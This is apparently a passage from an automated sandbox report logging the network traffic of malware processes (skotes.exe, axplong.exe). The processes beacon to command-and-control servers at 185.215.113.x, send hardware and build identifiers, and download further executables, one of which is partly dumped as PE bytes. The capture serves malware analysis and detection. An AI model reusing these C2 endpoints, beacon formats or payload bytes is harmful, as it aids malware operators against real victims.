                                                      Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 2d 2d 0d 0a
                                                      Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="build"save------JDAFBKECAKFCAAAKJDAK--
                                                      Sep 24, 2024 15:36:15.278498888 CEST211INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:36:15 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 8
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                      Data Ascii: YmxvY2s=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      84192.168.2.749841185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:16.349709034 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:36:16.831505060 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:16 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      85192.168.2.749842185.215.113.117807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:18.323409081 CEST58OUTGET /inc/needmoney.exe HTTP/1.1
                                                      Host: 185.215.113.117
                                                      Sep 24, 2024 15:36:19.023339033 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:18 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 4278784
                                                      Last-Modified: Thu, 12 Sep 2024 13:56:06 GMT
                                                      Connection: keep-alive
                                                      ETag: "66e2f2f6-414a00"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ba 08 00 00 8c 38 00 00 00 00 00 4c c9 08 00 00 10 00 00 00 d0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 [TRUNCATED]
                                                      Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*8L@A@x" 7`@PCODE `DATA -.@BSS.idatax"$@.tls@.rdataP@P.reloc@`@P.rsrc7 7@PAJA@P
                                                      Sep 24, 2024 15:36:19.023358107 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40
                                                      Data Ascii: @Boolean@FalseTrue@,@Char@@SmallintX@Integerp@Byte@Word@Cardinal@Int64
                                                      Sep 24, 2024 15:36:19.023370981 CEST1236INData Raw: 50 08 8b 56 04 89 50 0c 8b 13 89 10 89 58 04 89 42 04 89 03 b0 01 5e 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15 e8 05 49 00 89 10 a3 e8 05 49 00 c3 53 56 57 55 51 8b f1 89 14 24 8b e8 8b 5d 00 8b 04 24 8b 10 89 16 8b 50 04 89 56 04 8b 3b 8b 06 8b
                                                      Data Ascii: PVPXB^[PQIISVWUQ$]$PV;SS;uCCFF;CuCF;uVu3Z]_^[SVWU2C;rpJk;wb;uBCB)C{uH9?zk;u)
                                                      Sep 24, 2024 15:36:19.023438931 CEST1236INData Raw: 83 7c 24 0c 00 75 b1 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 25 fd ff ff 8b 04 24 33 d2 89 10 e9 90 00 00 00 8d 4c 24 04 8b d7 8b c6 e8 94 fc ff ff 83 7c 24 04 00 74 34 8d 4c 24 0c 8d 54 24 04 8b c5 e8 16 fb ff ff 83 7c 24 0c 00 0f 85 66 ff ff ff
                                                      Data Ascii: |$uL$T$D$%$3L$|$t4L$T$|$fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$?4$;s[+L$
                                                      Sep 24, 2024 15:36:19.023452044 CEST1236INData Raw: 83 fa 0c 7f 04 8b f8 2b fe 8b c6 2b c5 83 f8 0c 7d 14 8d 4c 24 01 8b d6 2b 53 08 03 d7 8b c5 e8 c5 fb ff ff eb 11 8d 4c 24 01 8b d7 83 ea 04 8d 46 04 e8 b2 fb ff ff 8b 6c 24 01 85 ed 74 34 8b d5 2b d6 8b c6 e8 63 fe ff ff 8b c5 03 44 24 05 8b 53
                                                      Data Ascii: ++}L$+SL$Fl$t4+cD$SS;s7+T$$$]_^[@SVWsp7y$IDu$I\[:CZ,<|uI
                                                      Sep 24, 2024 15:36:19.023458958 CEST1236INData Raw: 05 49 00 e8 fd f0 ff ff c3 e9 ef 16 00 00 eb e5 8b 45 fc 5f 5e 5b 59 59 5d c3 8d 40 00 55 8b ec 51 53 56 57 8b d8 33 c0 a3 c8 05 49 00 80 3d c4 05 49 00 00 75 1f e8 66 f7 ff ff 84 c0 75 16 c7 05 c8 05 49 00 08 00 00 00 c7 45 fc 08 00 00 00 e9 61
                                                      Data Ascii: IE_^[YY]@UQSVW3I=IufuIEa3Uh$@d1d!=MIthIuII%)ItEP|tI+;PtIT
                                                      Sep 24, 2024 15:36:19.023467064 CEST776INData Raw: e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c d0 48 00 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 43 3b 00 00 83 b8 00 00 00 00 00 74 0f e8 35 3b 00 00 8b 80 00 00 00 00 8b 40 08 c3 33 c0 c3 e8 23 3b 00 00 83 b8 00 00 00 00 00 74 0f e8 15 3b 00 00 8b 80
                                                      Data Ascii: tP<HYt@C;t5;@3#;t;@3SV;t:^:3F3^[@HqSV=ItIu:w3HH3^[$
                                                      Sep 24, 2024 15:36:19.023556948 CEST1236INData Raw: d7 f3 a4 5f 5e c3 88 c8 2a 0f 76 f7 88 ca eb e8 c3 33 c9 8a 0a 41 92 e8 65 fe ff ff c3 53 8a 1a 3a cb 76 02 8b cb 88 08 42 40 81 e1 ff 00 00 00 92 e8 4b fe ff ff 5b c3 90 53 56 57 89 c6 89 d7 31 c0 31 d2 8a 06 8a 17 46 47 29 d0 77 02 01 c2 52 c1
                                                      Data Ascii: _^*v3AeS:vB@K[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6
                                                      Sep 24, 2024 15:36:19.023565054 CEST1236INData Raw: 8f a1 5f 40 df 4e 67 04 cd c9 f2 c9 62 40 96 22 81 45 40 7c 6f fc 65 40 9e b5 70 2b a8 ad c5 9d 69 40 d5 a6 cf ff 49 1f 78 c2 d3 40 a3 14 9b c5 16 ab b3 ef 3d 41 e0 8c e9 80 c9 47 ba 93 a8 41 aa 17 e6 7f 2b a1 16 b6 12 42 6b 55 27 39 8d f7 70 e0
                                                      Data Ascii: _@Ngb@"E@|oe@p+i@Ix@=AGA+BkU'9p|B0<RB~QC/j\&Cv)/&D'DDYdEJzEb>9FFuuvHM9;5S]=];Z T7aZ%]g']
                                                      Sep 24, 2024 15:36:19.023576975 CEST1236INData Raw: ff ff 59 58 74 02 ff e6 59 e9 63 f5 ff ff c3 8b c0 eb 02 8b 00 39 d0 74 08 8b 40 dc 85 c0 75 f3 c3 b0 01 c3 90 83 c0 c4 8b 00 c3 8b c0 b8 ff ff 00 80 c3 8b c0 c3 8d 40 00 c3 8d 40 00 c3 8d 40 00 56 66 8b 32 66 09 f6 74 17 66 81 fe 00 c0 73 10 50
                                                      Data Ascii: YXtYc9t@u@@@Vf2ftfsPpXt^^aSVW11ptf>N8tfOu@u\12uIuF_^[SVW11ptf;VtfIu@u1A
                                                      Sep 24, 2024 15:36:19.028297901 CEST1236INData Raw: 8b 44 24 14 8b 48 0c eb 27 80 3d 2c d0 48 00 01 76 1e 80 3d 28 d0 48 00 00 77 15 50 8d 44 24 08 52 51 50 e8 31 d9 ff ff 83 f8 00 59 5a 58 74 6d 31 db 64 8b 1b 53 50 52 51 8b 54 24 28 83 48 04 02 56 6a 00 50 68 c0 39 40 00 52 ff 15 18 00 49 00 5b
                                                      Data Ascii: D$H'=,Hv=(HwPD$RQP1YZXtm1dSPRQT$(HVjPh9@RI[|$()oG9@D$c#Z)AD$T$@tJBD:@SVWUj]_^[uZTUWVSPR


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      86192.168.2.749843185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:18.470278025 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      87192.168.2.749844185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:20.113787889 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:36:20.827478886 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:20 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      88192.168.2.749845185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:22.349008083 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      89192.168.2.749846185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:23.989526033 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:36:24.710036993 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:24 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      90192.168.2.749848185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:26.234930038 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:36:26.959755898 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:26 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      91192.168.2.749849185.215.113.117807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:27.366879940 CEST142OUTGET /inc/needmoney.exe HTTP/1.1
                                                      Host: 185.215.113.117
                                                      If-Modified-Since: Thu, 12 Sep 2024 13:56:06 GMT
                                                      If-None-Match: "66e2f2f6-414a00"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      92192.168.2.749850185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:29.328222036 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      93192.168.2.749851185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:30.884629965 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:36:31.636586905 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:31 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      94192.168.2.749852185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:33.014321089 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: e0=1000191001&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      95192.168.2.749853185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:34.288258076 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:36:34.981978893 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:34 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      96192.168.2.749854185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:36.507889986 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:36:37.226485014 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      97192.168.2.749855185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:38.065440893 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: e0=1000191001&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      98192.168.2.749856185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:38.886593103 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:36:39.611897945 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:39 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      99192.168.2.749859185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:41.132656097 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      100192.168.2.749865185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:42.770572901 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:36:43.503204107 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      101192.168.2.749866185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:43.087723017 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: e0=1000191001&unit=246122658369
                                                      Sep 24, 2024 15:36:43.818926096 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      102192.168.2.749867185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:43.831479073 CEST53OUTGET /inc/penis.exe HTTP/1.1
                                                      Host: 185.215.113.16


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
